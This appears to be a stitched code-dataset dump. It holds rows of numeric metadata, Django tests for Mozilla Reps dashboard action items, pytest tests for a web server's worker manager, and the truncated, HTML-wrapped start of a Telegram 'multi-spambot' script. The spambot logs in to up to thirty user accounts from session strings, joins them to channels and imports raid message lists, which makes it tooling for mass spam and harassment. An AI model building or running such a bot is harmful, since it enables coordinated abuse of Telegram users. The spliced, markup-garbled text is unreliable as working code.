| 0.5
| 0.282609
| 0.369565
| 0.478261
| 0.565217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108333
| 120
| 4
| 43
| 30
| 0.859813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
4ca935b9835205e01e9b4778280cb7a6d5eec9ad
| 20,876
|
py
|
Python
|
remo/dashboard/tests/test_models.py
|
Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d
|
23ca8d46496b491fbdb2b8a72c91e75372932f23
|
[
"BSD-3-Clause"
] | 27
|
2015-01-02T18:47:56.000Z
|
2021-08-14T11:48:24.000Z
|
remo/dashboard/tests/test_models.py
|
Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d
|
23ca8d46496b491fbdb2b8a72c91e75372932f23
|
[
"BSD-3-Clause"
] | 450
|
2015-01-02T12:29:50.000Z
|
2020-10-27T21:41:38.000Z
|
remo/dashboard/tests/test_models.py
|
Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d
|
23ca8d46496b491fbdb2b8a72c91e75372932f23
|
[
"BSD-3-Clause"
] | 81
|
2015-01-10T23:59:32.000Z
|
2021-08-19T17:08:56.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from django.contrib.auth.models import Group
from django.contrib.contenttypes.models import ContentType
from django.utils.timezone import now
import mock
from nose.tools import eq_, ok_
from remo.base.tests import RemoTestCase
from remo.dashboard.models import ActionItem
from remo.events.models import Event
from remo.events.tasks import notify_event_owners_to_input_metrics
from remo.events.tests import EventFactory, EventMetricOutcomeFactory
from remo.profiles.models import UserProfile
from remo.profiles.tasks import (resolve_nomination_action_items,
send_rotm_nomination_reminder)
from remo.profiles.tests import UserFactory
from remo.remozilla.models import Bug
from remo.remozilla.tests import BugFactory
from remo.reports import ACTIVITY_EVENT_ATTEND, ACTIVITY_EVENT_CREATE, RECRUIT_MOZILLIAN
from remo.reports.models import NGReport
from remo.reports.tests import ActivityFactory, NGReportFactory
from remo.voting.models import Poll
from remo.voting.tasks import resolve_action_items
from remo.voting.tests import PollFactory, VoteFactory
class RemozillaActionItems(RemoTestCase):
"""Test related to new action items created from bugzilla."""
def test_waiting_receipts(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
whiteboard = '[waiting receipts]'
user = UserFactory.create(groups=['Rep'])
bug = BugFactory.create(whiteboard=whiteboard, assigned_to=user, summary=u'À summary')
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
eq_(items.count(), 1)
eq_(items[0].name, 'Add receipts for ' + bug.summary)
eq_(items[0].user, user)
eq_(items[0].priority, ActionItem.NORMAL)
def test_waiting_multiple_documents(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
whiteboard = '[waiting receipts][waiting report][waiting photos]'
user = UserFactory.create(groups=['Rep'])
bug = BugFactory.create(whiteboard=whiteboard, assigned_to=user)
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
eq_(items.count(), 3)
namelist = ['Add receipts for ' + bug.summary,
'Add report for ' + bug.summary,
'Add photos for ' + bug.summary]
for item in items:
ok_(item.name in namelist)
eq_(item.user, user)
eq_(item.priority, ActionItem.NORMAL)
def test_update_bug_whiteboard(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
whiteboard = '[waiting receipts][waiting report][waiting photos]'
user = UserFactory.create(groups=['Rep'])
bug = BugFactory.create(whiteboard=whiteboard, assigned_to=user)
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 3)
bug.whiteboard = ''
bug.save()
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
for item in items:
ok_(item.completed)
ok_(item.resolved)
def test_mentor_validation(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
mentor = UserFactory.create(groups=['Rep', 'Mentor'])
UserFactory.create(groups=['Rep'], userprofile__mentor=mentor)
bug = BugFactory.create(pending_mentor_validation=True, assigned_to=mentor)
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
eq_(items.count(), 1)
eq_(items[0].name, 'Waiting mentor validation for ' + bug.summary)
eq_(items[0].user, mentor)
eq_(items[0].priority, ActionItem.BLOCKER)
def test_change_assigned_user(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
user_1 = UserFactory.create(groups=['Rep'])
user_2 = UserFactory.create(groups=['Rep'])
bug = BugFactory.create(assigned_to=user_1, pending_mentor_validation=True)
item = ActionItem.objects.get(content_type=model, object_id=bug.id)
eq_(item.user, user_1)
bug.assigned_to = user_2
bug.save()
item = ActionItem.objects.get(content_type=model, object_id=bug.id)
eq_(item.user, user_2)
def test_resolve_mentor_validation(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
mentor = UserFactory.create(groups=['Rep', 'Mentor'])
UserFactory.create(groups=['Rep'], userprofile__mentor=mentor)
bug = BugFactory.create(pending_mentor_validation=True, assigned_to=mentor)
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 1)
eq_(items[0].name, 'Waiting mentor validation for ' + bug.summary)
eq_(items[0].user, mentor)
eq_(items[0].priority, ActionItem.BLOCKER)
bug.pending_mentor_validation = False
bug.save()
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
for item in items:
ok_(item.completed)
ok_(item.resolved)
def test_needinfo(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
needinfo = UserFactory.create(groups=['Rep'])
user = UserFactory.create(groups=['Rep'])
bug = BugFactory.create(assigned_to=user)
bug.budget_needinfo.add(needinfo)
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
ok_(items.count(), 1)
for item in items:
eq_(item.name, 'Need info for ' + bug.summary)
eq_(item.user, needinfo)
ok_(item.priority, ActionItem.MINOR)
def test_remove_needinfo(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
user = UserFactory.create(groups=['Rep'])
bug = BugFactory.create()
bug.budget_needinfo.add(user)
bug.budget_needinfo.clear()
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
for item in items:
ok_(item.completed)
ok_(item.resolved)
def test_council_reviewer_assigned(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
user = UserFactory.create(groups=['Rep', 'Council'])
bug = BugFactory.create(assigned_to=user, council_member_assigned=True)
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
eq_(items.count(), 1)
eq_(items[0].name, 'Review budget request ' + bug.summary)
eq_(items[0].user, user)
eq_(items[0].priority, ActionItem.BLOCKER)
def test_council_reviewer_removed(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
user = UserFactory.create(groups=['Council'])
bug = BugFactory.create(assigned_to=user, council_member_assigned=True)
bug.council_member_assigned = False
bug.save()
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
for item in items:
ok_(item.completed)
ok_(item.resolved)
def test_remove_assignee(self):
model = ContentType.objects.get_for_model(Bug)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
user = UserFactory.create(groups=['Rep'])
bug = BugFactory.create(pending_mentor_validation=True, assigned_to=user)
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 1)
eq_(items[0].name, 'Waiting mentor validation for ' + bug.summary)
eq_(items[0].user, user)
eq_(items[0].priority, ActionItem.BLOCKER)
bug.assigned_to = None
bug.save()
items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
for item in items:
ok_(item.resolved)
ok_(not item.completed)
class VotingActionItems(RemoTestCase):
def test_vote_action_item(self):
model = ContentType.objects.get_for_model(Poll)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
council = Group.objects.get(name='Council')
user = UserFactory.create(groups=['Council'])
start = now() - timedelta(hours=3)
poll = PollFactory.create(valid_groups=council, start=start)
items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
eq_(items.count(), 1)
for item in items:
eq_(item.name, 'Cast your vote for ' + poll.name)
eq_(item.user, user)
ok_(item.priority, ActionItem.NORMAL)
ok_(not item.completed)
def test_budget_vote_action_item(self):
model = ContentType.objects.get_for_model(Poll)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
council = Group.objects.get(name='Council')
user = UserFactory.create(groups=['Council'])
bug = BugFactory.create()
start = now() - timedelta(hours=3)
poll = PollFactory.create(valid_groups=council, automated_poll=True, bug=bug, start=start)
items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
eq_(items.count(), 1)
for item in items:
eq_(item.name, 'Cast your vote for budget request ' + poll.bug.summary)
eq_(item.user, user)
ok_(item.priority, ActionItem.NORMAL)
ok_(not item.completed)
def test_future_vote_action_item(self):
model = ContentType.objects.get_for_model(Poll)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
council = Group.objects.get(name='Council')
start = now() + timedelta(hours=3)
PollFactory.create(valid_groups=council, start=start)
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 0)
def test_resolve_vote_action_item(self):
model = ContentType.objects.get_for_model(Poll)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
council = Group.objects.get(name='Council')
user = UserFactory.create(groups=['Council'])
start = now() - timedelta(hours=3)
poll = PollFactory.create(valid_groups=council, start=start)
VoteFactory.create(poll=poll, user=user)
items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
eq_(items.count(), 1)
for item in items:
ok_(item.completed)
ok_(item.resolved)
def test_update_vote_due_date(self):
model = ContentType.objects.get_for_model(Poll)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
council = Group.objects.get(name='Council')
UserFactory.create(groups=['Council'])
start = now() - timedelta(hours=3)
poll = PollFactory.create(valid_groups=council, start=start)
poll.end = poll.end + timedelta(days=4)
poll.save()
items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
eq_(items.count(), 1)
for item in items:
eq_(item.due_date, poll.end.date())
def test_resolved_past_vote(self):
model = ContentType.objects.get_for_model(Poll)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
council = Group.objects.get(name='Council')
UserFactory.create(groups=['Council'])
start = now() - timedelta(hours=3)
poll = PollFactory.create(valid_groups=council,
end=now() - timedelta(days=1),
start=start)
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 1)
resolve_action_items()
items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
for item in items:
ok_(item.resolved)
ok_(not item.completed)
def test_update_valid_groups(self):
model = ContentType.objects.get_for_model(Poll)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
council = Group.objects.get(name='Council')
reps = Group.objects.get(name='Rep')
UserFactory.create_batch(3, groups=['Council'])
UserFactory.create_batch(4, groups=['Rep'])
start = now() - timedelta(hours=3)
poll = PollFactory.create(valid_groups=council, start=start)
poll.valid_groups = reps
poll.save()
items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
eq_(items.count(), 4)
for user in reps.user_set.all():
ok_(items.filter(user=user).exists())
for user in council.user_set.all():
ok_(not items.filter(user=user).exists())
def test_user_has_already_voted(self):
model = ContentType.objects.get_for_model(Poll)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
council = Group.objects.get(name='Admin')
user = UserFactory.create(groups=['Admin'])
start = now() - timedelta(hours=3)
poll = PollFactory.create(valid_groups=council,
end=now() - timedelta(days=1),
start=start)
VoteFactory.create(poll=poll, user=user)
# Check that there is only one action item and it's resolved
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 1)
eq_(items[0].resolved, True)
class EventActionItems(RemoTestCase):
def setUp(self):
ActivityFactory.create(name=ACTIVITY_EVENT_CREATE)
ActivityFactory.create(name=ACTIVITY_EVENT_ATTEND)
def test_post_event_metrics(self):
model = ContentType.objects.get_for_model(Event)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
start = now() - timedelta(days=4)
end = now() - timedelta(days=1)
user = UserFactory.create(groups=['Rep'])
event = EventFactory.create(owner=user, start=start, end=end)
notify_event_owners_to_input_metrics()
items = ActionItem.objects.filter(content_type=model, object_id=event.id)
eq_(items.count(), 1)
def test_resolve_post_event_metrics(self):
model = ContentType.objects.get_for_model(Event)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
start = now() - timedelta(days=4)
end = now() - timedelta(days=1)
user = UserFactory.create(groups=['Rep'])
event = EventFactory.create(owner=user, start=start, end=end)
notify_event_owners_to_input_metrics()
items = ActionItem.objects.filter(content_type=model, object_id=event.id)
eq_(items.count(), 1)
EventMetricOutcomeFactory.create(event=event)
for item in items:
ok_(item.completed)
ok_(item.resolved)
def test_update_event_owner(self):
model = ContentType.objects.get_for_model(Event)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
start = now() - timedelta(days=4)
end = now() - timedelta(days=1)
user = UserFactory.create(groups=['Rep'])
event = EventFactory.create(owner=user, start=start, end=end)
notify_event_owners_to_input_metrics()
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 1)
new_owner = UserFactory.create(groups=['Rep'])
event.owner = new_owner
event.save()
items = ActionItem.objects.filter(content_type=model, object_id=event.id)
eq_(items.count(), 1)
eq_(items[0].user, new_owner)
class ReportActionItems(RemoTestCase):
def test_verify_activity(self):
model = ContentType.objects.get_for_model(NGReport)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
activity = ActivityFactory.create(name=RECRUIT_MOZILLIAN)
mentor = UserFactory.create()
user = UserFactory.create(groups=['Rep'], userprofile__mentor=mentor)
report = NGReportFactory.create(activity=activity, user=user,
mentor=mentor)
items = ActionItem.objects.filter(content_type=model,
object_id=report.id,
resolved=False)
eq_(items.count(), 1)
def test_resolve_verify_action_item(self):
model = ContentType.objects.get_for_model(NGReport)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
activity = ActivityFactory.create(name=RECRUIT_MOZILLIAN)
mentor = UserFactory.create()
user = UserFactory.create(groups=['Rep'], userprofile__mentor=mentor)
report = NGReportFactory.create(activity=activity, user=user,
mentor=mentor)
items = ActionItem.objects.filter(content_type=model,
object_id=report.id,
resolved=False)
eq_(items.count(), 1)
report.verified_activity = True
report.save()
for item in items:
ok_(item.completed)
ok_(item.resolved)
class ROTMActionItems(RemoTestCase):
@mock.patch('remo.profiles.tasks.now')
def test_base(self, mocked_date):
model = ContentType.objects.get_for_model(UserProfile)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
mentors = UserFactory.create_batch(2, groups=['Mentor'])
mocked_date.return_value = datetime(now().year, now().month, 1)
send_rotm_nomination_reminder()
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 2)
eq_(set([mentor.id for mentor in mentors]),
set(items.values_list('object_id', flat=True)))
@mock.patch('remo.profiles.tasks.now')
def test_invalid_date(self, mocked_date):
model = ContentType.objects.get_for_model(UserProfile)
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
UserFactory.create_batch(2, groups=['Mentor'])
mocked_date.return_value = datetime(now().year, now().month, 2)
send_rotm_nomination_reminder()
items = ActionItem.objects.filter(content_type=model)
ok_(not items.exists())
@mock.patch('remo.profiles.tasks.now')
def test_resolve_action_item(self, mocked_date):
model = ContentType.objects.get_for_model(UserProfile)
user = UserFactory.create(groups=['Mentor'])
mocked_date.return_value = datetime(now().year, now().month, 1)
ActionItem.create(user.userprofile)
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 1)
eq_(items[0].resolved, False)
mocked_date.return_value = datetime(now().year, now().month, 10)
resolve_nomination_action_items()
eq_(items.count(), 1)
eq_(items[0].resolved, True)
@mock.patch('remo.profiles.tasks.now')
def test_resolve_action_item_invalid_date(self, mocked_date):
model = ContentType.objects.get_for_model(UserProfile)
user = UserFactory.create(groups=['Mentor'])
mocked_date.return_value = datetime(now().year, now().month, 1)
ActionItem.create(user.userprofile)
items = ActionItem.objects.filter(content_type=model)
eq_(items.count(), 1)
eq_(items[0].resolved, False)
mocked_date.return_value = datetime(now().year, now().month, 11)
resolve_nomination_action_items()
eq_(items.count(), 1)
eq_(items[0].resolved, False)
| 37.956364
| 98
| 0.652711
| 2,489
| 20,876
| 5.284452
| 0.075934
| 0.077549
| 0.072987
| 0.12347
| 0.817
| 0.792519
| 0.786361
| 0.783776
| 0.769178
| 0.760891
| 0
| 0.005259
| 0.234815
| 20,876
| 549
| 99
| 38.025501
| 0.818142
| 0.006563
| 0
| 0.703088
| 0
| 0
| 0.033185
| 0.004438
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068884
| false
| 0
| 0.052257
| 0
| 0.133017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4cf0c146eb352e3207d88b780068cc4abf4c7e27
| 4,562
|
py
|
Python
|
tests/test_manager.py
|
lilyinstarlight/python-fooster-web
|
928b61b85d28ed119e07cc397f855ee914a82d6b
|
[
"MIT"
] | 2
|
2018-07-17T17:38:42.000Z
|
2020-01-01T18:24:33.000Z
|
tests/test_manager.py
|
lilyinstarlight/python-fooster-web
|
928b61b85d28ed119e07cc397f855ee914a82d6b
|
[
"MIT"
] | 18
|
2016-06-07T15:12:00.000Z
|
2017-09-25T20:01:32.000Z
|
tests/test_manager.py
|
fkmclane/web.py
|
928b61b85d28ed119e07cc397f855ee914a82d6b
|
[
"MIT"
] | null | null | null |
import multiprocessing
import time
from fooster.web import web
import mock
import pytest
@pytest.mark.xfail
def test_manager_create():
sync = multiprocessing.get_context(web.start_method).Manager()
server = mock.MockHTTPServer(sync=sync)
server.manager_process = multiprocessing.get_context(web.start_method).Process(target=web.HTTPServer.manager, args=(server,))
server.manager_process.start()
# wait a bit
time.sleep(server.poll_interval + 1)
try:
assert server.manager_process.is_alive()
assert server.cur_processes.value == server.num_processes
finally:
server.namespace.manager_shutdown = True
server.manager_process.join(timeout=server.poll_interval + 1)
server.namespace.manager_shutdown = False
@pytest.mark.xfail
def test_worker_death():
sync = multiprocessing.get_context(web.start_method).Manager()
server = mock.MockHTTPServer(sync=sync)
server.manager_process = multiprocessing.get_context(web.start_method).Process(target=web.HTTPServer.manager, args=(server,))
server.manager_process.start()
# wait a bit
time.sleep(server.poll_interval + 1)
try:
num_processes = server.cur_processes.value
assert num_processes == server.num_processes
server.namespace.worker_shutdown = 0
# wait a bit for process to die
time.sleep(server.poll_interval + 1)
server.namespace.worker_shutdown = None
# wait a bit for process restart
time.sleep(server.poll_interval + 1)
# make sure the process restarted
assert server.cur_processes.value == num_processes
finally:
server.namespace.manager_shutdown = True
server.manager_process.join(timeout=server.poll_interval + 1)
server.namespace.manager_shutdown = False
@pytest.mark.xfail
def test_manager_scaling():
sync = multiprocessing.get_context(web.start_method).Manager()
server = mock.MockHTTPServer(sync=sync)
server.manager_process = multiprocessing.get_context(web.start_method).Process(target=web.HTTPServer.manager, args=(server,))
server.manager_process.start()
# wait a bit
time.sleep(server.poll_interval + 1)
try:
for _ in range(server.max_queue):
with server.requests_lock:
server.requests.value += 1
# wait a bit for processes start
time.sleep(server.poll_interval * server.max_processes + 1)
# just make sure it is spawning some but not too many processes
num_processes = server.cur_processes.value
assert num_processes > server.num_processes
assert num_processes <= server.max_processes
# mark a task as done
with server.requests_lock:
server.requests.value -= 1
# wait a bit for another poll
time.sleep(server.poll_interval * server.max_processes + 1)
# make sure the number didn't go down (and isn't over the max)
last_processes = num_processes
num_processes = server.cur_processes.value
assert num_processes >= last_processes
assert num_processes <= server.max_processes
# mark all tasks as done
with server.requests_lock:
while server.requests.value > 0:
server.requests.value -= 1
# wait a bit for another poll
time.sleep(server.poll_interval * server.max_processes + 1)
# make sure the number at least went down
last_processes = num_processes
num_processes = server.cur_processes.value
assert num_processes < last_processes
assert num_processes >= server.num_processes
finally:
server.namespace.manager_shutdown = True
server.manager_process.join(timeout=server.poll_interval + 1)
server.namespace.manager_shutdown = False
@pytest.mark.xfail
def test_manager_no_scale():
sync = multiprocessing.get_context(web.start_method).Manager()
server = mock.MockHTTPServer(max_queue=None, sync=sync)
server.manager_process = multiprocessing.get_context(web.start_method).Process(target=web.HTTPServer.manager, args=(server,))
server.manager_process.start()
# wait a bit
time.sleep(server.poll_interval + 1)
try:
assert server.manager_process.is_alive()
assert server.cur_processes.value == server.num_processes
finally:
server.namespace.manager_shutdown = True
server.manager_process.join(timeout=server.poll_interval + 1)
server.namespace.manager_shutdown = False
| 32.126761
| 129
| 0.701008
| 568
| 4,562
| 5.445423
| 0.169014
| 0.073715
| 0.090527
| 0.061429
| 0.881668
| 0.860653
| 0.817329
| 0.817329
| 0.799224
| 0.784352
| 0
| 0.005034
| 0.216133
| 4,562
| 141
| 130
| 32.35461
| 0.859899
| 0.094038
| 0
| 0.755814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 1
| 0.046512
| false
| 0
| 0.05814
| 0
| 0.104651
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4cf5d4e8c698db8eef4111e1c5162f8d2459e67a
| 94,575
|
py
|
Python
|
Yash.py
|
Harpres/Harpreet-multi-spambot
|
83410723b8683b0eb111e65bd84d469d496a0dbc
|
[
"MIT"
] | null | null | null |
Yash.py
|
Harpres/Harpreet-multi-spambot
|
83410723b8683b0eb111e65bd84d469d496a0dbc
|
[
"MIT"
] | null | null | null |
Yash.py
|
Harpres/Harpreet-multi-spambot
|
83410723b8683b0eb111e65bd84d469d496a0dbc
|
[
"MIT"
] | 1
|
2022-03-27T10:04:20.000Z
|
2022-03-27T10:04:20.000Z
|
<div>import os<br/>import sys<br/>import random<br/>from datetime import datetime<br/>from os import execl<br/>from telethon import TelegramClient, events<br/>from telethon.sessions import StringSession<br/>from telethon.tl.functions.account import UpdateProfileRequest<div></div><br/>from telethon.errors import (<br/> ChannelInvalidError,<br/> ChannelPrivateError,<br/> ChannelPublicGroupNaError,<br/>)<br/>from telethon.tl import functions<br/>from telethon.tl.functions.channels import GetFullChannelRequest<br/>from telethon.tl.functions.messages import GetFullChatRequest<div></div><br/>from Config import STRING, SUDO, BIO_MESSAGE, ALIVE_NAME, API_ID, API_HASH, STRING2, STRING3, STRING4 ,STRING5, STRING6, STRING7, STRING8 ,STRING9, STRING10, STRING11, STRING12 , STRING13 , STRING14 , STRING15 ,STRING16 , STRING17 , STRING18 , STRING19 , STRING20 , STRING21 , STRING22 , STRING23 , STRING24 , STRING25 , STRING26 , STRING27 , STRING28 , STRING29 , STRING30<br/>import asyncio<br/>import telethon.utils<br/>from telethon.tl import functions<br/>from telethon.tl.functions.channels import LeaveChannelRequest<br/>from telethon.tl.functions.messages import ImportChatInviteRequest<br/>from Utils import RAID, RRAID<div></div><br/>a = API_ID<br/>b = API_HASH<br/>smex = STRING<br/>smexx = STRING2<br/>smexxx = STRING3<br/>smexxxx = STRING4<br/>smexxxxx = STRING5<br/>sixth = STRING6<br/>seven = STRING7<br/>eight = STRING8<br/>ninth = STRING9<br/>tenth = STRING10<br/>eleve = STRING11<br/>twelv = STRING12<br/>thirt = STRING13<br/>forte = STRING14<br/>fifth = STRING15<br/>sieee = STRING16<br/>seeee = STRING17<br/>eieee = STRING18<br/>nieee = STRING19<br/>gandu = STRING20<br/>ekish = STRING21<br/>baish = STRING22<br/>teish = STRING23<br/>tfour = STRING24<br/>tfive = STRING25<br/>tsix = STRING26<br/>tseven = STRING27<br/>teight = STRING28<br/>tnine = STRING29<br/>thirty = STRING30<div></div><div></div>idk = ""<br/>ydk = ""<br/>wdk = ""<br/>sdk = ""<br/>hdk = ""<br/>adk = ""<br/>bdk = ""<br/>cdk = ""<br/>edk = ""<br/>ddk = ""<br/>vkk = ""<br/>kkk = ""<br/>lkk = ""<br/>mkk = ""<br/>sid = ""<br/>shy = ""<br/>aan = ""<br/>ake = ""<br/>eel = ""<br/>khu = ""<br/>shi = ""<br/>yaa = ""<br/>dav = ""<br/>raj = ""<br/>put = ""<br/>eag = ""<br/>gle = ""<br/>wal = ""<br/>aaa = ""<br/>boy = ""<div></div><div></div>que = {}<div></div>SMEX_USERS = []<br/>for x in SUDO: <br/> SMEX_USERS.append(x)<br/> <br/>async def start_yukki():<br/> global idk<br/> global ydk<br/> global wdk<br/> global sdk<br/> global hdk<br/> global adk<br/> global bdk<br/> global cdk<br/> global ddk<br/> global edk<br/> global vkk<br/> global kkk<br/> global lkk<br/> global mkk<br/> global sid<br/> global shy<br/> global aan<br/> global ake<br/> global eel<br/> global khu<br/> global shi<br/> global yaa<br/> global dav<br/> global raj<br/> global put<br/> global eag<br/> global gle<br/> global wal<br/> global aaa<br/> global boy<br/> if smex:<br/> session_name = str(smex)<br/> print("String 1 Found")<br/> idk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 1")<br/> await idk.start()<br/> botme = await idk.get_me()<br/> await idk(functions.channels.JoinChannelRequest(channel=""))<br/> await idk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await idk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await idk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await idk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 1 not Found")<br/> session_name = "startup"<br/> idk = TelegramClient(session_name, a, b)<br/> try:<br/> await idk.start()<br/> except Exception as e:<br/> pass<br/> <br/> if smexx:<br/> session_name = str(smexx)<br/> print("String 2 Found")<br/> ydk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 2")<br/> await ydk.start()<br/> await ydk(functions.channels.JoinChannelRequest(channel=""))<br/> await ydk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ydk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ydk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ydk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await ydk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 2 not Found")<br/> pass<br/> session_name = "startup"<br/> ydk = TelegramClient(session_name, a, b)<br/> try:<br/> await ydk.start()<br/> except Exception as e:<br/> pass<div></div> if smexxx:<br/> session_name = str(smexxx)<br/> print("String 3 Found")<br/> wdk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 3")<br/> await wdk.start()<br/> await wdk(functions.channels.JoinChannelRequest(channel=""))<br/> await wdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await wdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 3 not Found")<br/> pass<br/> session_name = "startup"<br/> wdk = TelegramClient(session_name, a, b)<br/> try:<br/> await wdk.start()<br/> except Exception as e:<br/> pass<div></div> if smexxxx:<br/> session_name = str(smexxxx)<br/> print("String 4 Found")<br/> hdk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 4")<br/> await hdk.start()<br/> await hdk(functions.channels.JoinChannelRequest(channel=""))<br/> await hdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await hdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await hdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> <br/> await hdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await hdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 4 not Found")<br/> pass<br/> session_name = "startup"<br/> hdk = TelegramClient(session_name, a, b)<br/> try:<br/> await hdk.start()<br/> except Exception as e:<br/> pass<div></div> if smexxxxx:<br/> session_name = str(smexxxxx)<br/> print("String 5 Found")<br/> sdk = 